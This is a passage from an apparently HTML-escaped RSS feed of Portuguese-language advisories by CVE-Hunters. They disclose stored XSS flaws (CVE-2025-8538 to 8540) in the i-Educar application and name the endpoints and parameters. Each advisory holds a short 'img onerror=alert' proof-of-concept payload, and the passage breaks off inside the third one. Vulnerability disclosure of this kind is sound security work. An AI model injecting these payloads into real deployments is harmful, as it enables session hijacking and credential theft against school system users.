&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8538-múltiplos-cross-site-scripting-xss-armazenado-no-endpoint-tiposnovo&amp;#34;&amp;gt;CVE-2025-8538: Múltiplos Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8538&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Múltiplas vulnerabilidades de XSS (Cross-Site Scripting Armazenado) foram identificadas no endpoint &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos nos parâmetros &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;tipos/novo&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetros: &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário nos parâmetros &amp;lt;code&amp;gt;name&amp;lt;/code&amp;gt; e &amp;lt;code&amp;gt;description&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8538/image.png&amp;#34;
	width=&amp;#34;614&amp;#34;
	height=&amp;#34;248&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8538/image_hu_e726bbb8f011c269.png 480w, /p/cve-2025-8538/image_hu_2443b37b14c56128.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parâmetro “name”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;247&amp;#34;
		data-flex-basis=&amp;#34;594px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8538/image-1.png&amp;#34;
	width=&amp;#34;603&amp;#34;
	height=&amp;#34;240&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8538/image-1_hu_a11c807a5cc2d863.png 480w, /p/cve-2025-8538/image-1_hu_e38f31cce2d09ff0.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
		alt=&amp;#34;Parâmetro “description”&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;251&amp;#34;
		data-flex-basis=&amp;#34;603px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8538.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8539</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8539/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8539/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8539-cross-site-scripting-xss-armazenado-no-endpoint-public_distrito_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8539: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8539-cross-site-scripting-xss-armazenado-no-endpoint-public_distrito_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8539: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8539&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;public_distrito_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;amp;#34;&amp;amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(&amp;amp;#39;CVE-Hunters&amp;amp;#39;)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
&amp;lt;/span&amp;gt;&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;&amp;lt;/tr&amp;gt;&amp;lt;/table&amp;gt;
&amp;lt;/div&amp;gt;
&amp;lt;/div&amp;gt;&amp;lt;p&amp;gt;&amp;lt;img src=&amp;#34;/p/cve-2025-8539/image.png&amp;#34;
	width=&amp;#34;642&amp;#34;
	height=&amp;#34;260&amp;#34;
	srcset=&amp;#34;/p/cve-2025-8539/image_hu_837fe8e7d394bbec.png 480w, /p/cve-2025-8539/image_hu_26c8ccd795f751a6.png 1024w&amp;#34;
	loading=&amp;#34;lazy&amp;#34;
	
	
		class=&amp;#34;gallery-image&amp;#34; 
		data-flex-grow=&amp;#34;246&amp;#34;
		data-flex-basis=&amp;#34;592px&amp;#34;
	
 /&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;impacto&amp;#34;&amp;gt;Impacto
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;
    &amp;lt;ul&amp;gt;
        &amp;lt;li&amp;gt;Roubo de cookies de sessão: Invasores podem usar cookies de sessão roubados para sequestrar a sessão de um usuário e executar ações em seu nome.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Baixar malware: Invasores podem induzir os usuários a baixar e instalar malware em seus computadores.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Sequestro de navegadores: Invasores podem sequestrar o navegador de um usuário ou aplicar exploits baseados nele.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Roubo de credenciais: Invasores podem roubar as credenciais de um usuário.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Obter informações confidenciais: Invasores podem obter informações confidenciais armazenadas na conta de um usuário ou em seu navegador.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desfigurar sites: Invasores podem desfigurar um site alterando seu conteúdo.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Desorientar usuários: Invasores podem alterar as instruções fornecidas aos usuários que visitam o site alvo, desorientando seu comportamento.&amp;lt;/li&amp;gt;
        &amp;lt;li&amp;gt;Prejudicar a reputação de uma empresa: Invasores podem prejudicar a imagem de uma empresa ou espalhar desinformação desfigurando um site corporativo.&amp;lt;/li&amp;gt;
    &amp;lt;/ul&amp;gt;
&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;referência&amp;#34;&amp;gt;Referência
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://github.com/CVE-Hunters/CVE/blob/main/i-educar/CVE-2025-8539.md&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;encontrado-por&amp;#34;&amp;gt;Encontrado por:
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;&amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;&amp;lt;img src=&amp;#34;/assets/contributors/50x50/karina50x50.png&amp;#34;
	
	
	
	loading=&amp;#34;lazy&amp;#34;
	
	
 /&amp;gt;&amp;lt;/a&amp;gt; &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.linkedin.com/in/karina-gante/&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;Karina Gante&amp;lt;/a&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;By: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://github.com/CVE-Hunters/cve-hunters&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;CVE-Hunters&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
</content:encoded>
        <pubDate>Tue, 05 Aug 2025 00:00:00 &#43;0000</pubDate>
      </item>
    
      <item>
        <title>CVE-2025-8540</title>
        <link>https://www.cvehunters.com/pt/p/cve-2025-8540/</link>
        <guid>https://www.cvehunters.com/pt/p/cve-2025-8540/</guid>
        <description>&amp;lt;h2 id=&amp;#34;cve-2025-8540-cross-site-scripting-xss-armazenado-no-endpoint-public_municipio_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8540: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;</description><content:encoded>&amp;lt;h2 id=&amp;#34;cve-2025-8540-cross-site-scripting-xss-armazenado-no-endpoint-public_municipio_cadphp-parâmetro-nome&amp;#34;&amp;gt;CVE-2025-8540: Cross-Site Scripting (XSS) Armazenado no endpoint &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;
&amp;lt;/h2&amp;gt;&amp;lt;blockquote&amp;gt;
&amp;lt;p&amp;gt;&amp;lt;em&amp;gt;&amp;lt;strong&amp;gt;Publicação CVE: &amp;lt;a class=&amp;#34;link&amp;#34; href=&amp;#34;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;#34;  target=&amp;#34;_blank&amp;#34; rel=&amp;#34;noopener&amp;#34;
    &amp;gt;https://www.cve.org/CVERecord?id=CVE-2025-8540&amp;lt;/a&amp;gt;&amp;lt;/strong&amp;gt;&amp;lt;/em&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;/blockquote&amp;gt;
&amp;lt;h2 id=&amp;#34;resumo&amp;#34;&amp;gt;Resumo
&amp;lt;/h2&amp;gt;&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;Uma vulnerabilidade de XSS (Cross-Site Scripting Armazenado) foi identificada no endpoint &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt; do aplicativo i-Educar. Essa vulnerabilidade permite que invasores injetem scripts maliciosos no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Os scripts injetados são armazenados no servidor e executados automaticamente sempre que a página afetada é acessada pelos usuários, representando um risco de segurança significativo.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;detalhes&amp;#34;&amp;gt;Detalhes
&amp;lt;/h2&amp;gt;&amp;lt;p&amp;gt;Endpoint Vulnerável: &amp;lt;code&amp;gt;public_municipio_cad.php&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p&amp;gt;Parâmetro: &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;&amp;lt;/p&amp;gt;
&amp;lt;p style=&amp;#34;text-align: justify;&amp;#34;&amp;gt;O aplicativo não consegue validar e sanitizar adequadamente as entradas do usuário no parâmetro &amp;lt;code&amp;gt;nome&amp;lt;/code&amp;gt;. Essa falta de validação permite que invasores injetem scripts maliciosos, que são armazenados no servidor. Sempre que a página afetada é acessada, o payload malicioso é executado no navegador da vítima, potencialmente comprometendo os dados e o sistema do usuário.&amp;lt;/p&amp;gt;
&amp;lt;h2 id=&amp;#34;poc&amp;#34;&amp;gt;PoC
&amp;lt;/h2&amp;gt;&amp;lt;h3 id=&amp;#34;payload&amp;#34;&amp;gt;Payload:
&amp;lt;/h3&amp;gt;&amp;lt;div class=&amp;#34;highlight&amp;#34;&amp;gt;&amp;lt;div class=&amp;#34;chroma&amp;#34;&amp;gt;
&amp;lt;table class=&amp;#34;lntable&amp;#34;&amp;gt;&amp;lt;tr&amp;gt;&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code&amp;gt;&amp;lt;span class=&amp;#34;lnt&amp;#34;&amp;gt;1
&amp;lt;/span&amp;gt;&amp;lt;/code&amp;gt;&amp;lt;/pre&amp;gt;&amp;lt;/td&amp;gt;
&amp;lt;td class=&amp;#34;lntd&amp;#34;&amp;gt;
&amp;lt;pre tabindex=&amp;#34;0&amp;#34; class=&amp;#34;chroma&amp;#34;&amp;gt;&amp;lt;code class=&amp;#34;language-html&amp;#34; data-lang=&amp;#34;html&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;line&amp;#34;&amp;gt;&amp;lt;span class=&amp;#34;cl&amp;#34;&amp;gt;  &amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;lt;&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;nt&amp;#34;&amp;gt;img&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;src&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;x&amp;lt;/span&amp;gt; &amp;lt;span class=&amp;#34;na&amp;#34;&amp;gt;onerror&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;o&amp;#34;&amp;gt;=&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;s&amp;#34;&amp;gt;alert(1)&amp;lt;/span&amp;gt;&amp;lt;span class=&amp;#34;p&amp;#34;&amp;gt;&amp;amp;gt;&amp;lt;/span&amp;gt;
